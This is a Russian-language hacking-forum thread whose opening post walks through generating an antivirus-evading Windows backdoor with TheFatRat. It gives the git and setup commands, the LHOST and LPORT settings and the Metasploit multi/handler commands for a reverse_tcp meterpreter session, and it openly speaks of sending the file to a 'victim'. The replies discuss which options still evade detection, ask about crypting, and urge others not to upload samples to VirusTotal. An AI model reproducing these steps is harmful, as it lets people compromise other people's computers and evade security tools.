Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 
H

hdmoor

ХАРОШЬ ломаться, сказал А говори Б
берём например не 2-ю опцию, как у ТС а 6-ю и файл реально не детектится и весит чутка и т.п. и т.д....и опций там порядком ещё...

...там ещё есть файл Powerfull-fud.exe который палится наглухо АВ, не подскажите други зачем это он там?
я просёк в чём дело...этот Powerfull-fud.exe, тот файл, который все невнимательные экспериментаторы чекали на вирустотале и дали тем самым материал для сигнатур антивирусникам...поэтому он уже детектится наглухо...
 
Последнее редактирование модератором:
H

hdmoor

...дело прошлое, там всё уже дело прошлое один пункт работает на 98-100%FUD остальные палятся АВ какследует...криптить нуно
 
T

thetheron

image1185659.png

НУ ПИШЕТЖЕ В НАЧАЛЕ. НЕ ЛИТЬ В VT
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Еще один человек за закрытый раздел)
Я тоже плюсую за создадиня закрытого раздела.С чоткими правилами и попасть туда по рекомендацием администрации или членов команды форума.
Предлагаю сделать голосования на форуме об введении закрытого раздела.
Да здравствует АЧАТ.
[doublepost=1484898027,1484898002][/doublepost]Кстати да. НЕ ЛЕЙТЕ НА ВИРУСТОТАЛ.
[doublepost=1484898070][/doublepost]
Да уже давно сигнатуры этого софта есть на vt. Только спасет отдельная криптовка.
Криптовать криптор?! Эмммм......
 
H

hdmoor

Да здравствует АЧАТ.
[doublepost=1484898027,1484898002][/doublepost]Кстати да. НЕ ЛЕЙТЕ НА ВИРУСТОТАЛ.
[doublepost=1484898070][/doublepost]
Криптовать криптор?! Эмммм......
тебя выпустили что ли?...кто выписывал?...ЗАВЯЗЫВАЙТЕ ЗДЕСЬ ФЛУДИТЬ! ЗАКРОЙТЕ ЭТУ ТЕМУ И СНЕСИТЕ!!!!
ЗАКРОЙТЕ ТЕМУ!!!!
И СНЕСИТЕ!!!!
АУЕЕЕЕЕ!!!!!
Нарушение правил размещения сообщений. Следующее предупреждение приведет к блокировке возможности размещения сообщений.
 
Последнее редактирование модератором:
K

Kareon07

-- Да уже давно сигнатуры этого софта есть на vt. Только спасет отдельная криптовка.
Можете посоветовать чем лучше "криптовать" ?
 
K

KIra

При запуске вируса ,windows завершает работу.
 
A

Antenwik

При запуске вируса ,windows завершает работу.

Какой формат файла ны выводе стоит? (.dat , .exe , .pdf)?
[doublepost=1487189807,1487189455][/doublepost]Приватный раздел тоже приветствую. Можно создать его и после каких то условий получить доступ туда.
На счет новичков, если сделать приват без способа попасть туда, то просто перекроете им кислород.
А вот школяров думаю туда действительно пускать не стоит. Побалуются и все. Этим же обосрут все.

Так же поддерживаю, на ВИРУСТОТАЛ файл не заливать.
 
K

KIra

Какой формат файла ны выводе стоит? (.dat , .exe , .pdf)?
[doublepost=1487189807,1487189455][/doublepost]Приватный раздел тоже приветствую. Можно создать его и после каких то условий получить доступ туда.
На счет новичков, если сделать приват без способа попасть туда, то просто перекроете им кислород.
А вот школяров думаю туда действительно пускать не стоит. Побалуются и все. Этим же обосрут все.

Так же поддерживаю, на ВИРУСТОТАЛ файл не заливать.
bat не зависает в процессах ,а c exe всё отлично.
 

sosiskapi

Green Team
28.12.2016
57
22
BIT
0
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют))) Перед отправкой на VirusTotal прочти здесь !
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!